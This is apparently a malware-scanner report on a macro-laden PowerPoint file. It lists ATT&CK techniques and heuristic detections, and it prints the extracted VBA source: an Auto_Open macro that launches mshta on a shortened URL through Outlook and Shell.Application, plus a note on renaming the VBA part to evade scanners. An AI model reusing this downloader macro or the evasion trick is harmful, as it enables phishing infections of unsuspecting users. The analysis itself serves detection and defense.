MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an Auto_Open subroutine, which is automatically executed when the document is opened. This macro uses CreateObject to instantiate Shell.Application and then calls ShellExecute with a URL constructed from reversed strings. The reconstructed URL is 'https://www.bitly.com/adjcsdjcijscjsoksjmd', which is likely intended to download and execute a second-stage payload. The presence of the Auto_Open macro and the ShellExecute call strongly indicate a malicious intent to download and run further malware.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/sdtygcdrtyuh.b)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Outlook = CreateObject("Outlook.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Auto_Open _ -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.bitly.com/adjcsdjcijscjsoksjmd In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 826 bytes |
SHA-256: d736692815c15dd6978b1285fc22b33bda7990d9c8973a178dcbcbee1157996a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module111"
Sub _
Auto_Open _
()
Dim MsgBox As New topli
Set Outlook = CreateObject("Outlook.Application")
Set Microsoft = Outlook.CreateObject("Shell.Application")
Microsoft.ShellExecute MsgBox.mill, MsgBox.link
End _
Sub
Attribute VB_Name = "topli"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function mill()
o = StrReverse("M")
m = StrReverse("s")
l = StrReverse("H")
a = StrReverse("t")
i = StrReverse("A")
mill = o + m + l + a + i
End Function
Function link()
link = "https://www.bitly.com/adjcsdjcijscjsoksjmd"
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/sdtygcdrtyuh.b | 17920 bytes |
SHA-256: 0c0dfb7eaba94ea0d5f3713847b2c3823862a2cfd6cd14a994c5fa6040e24527 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.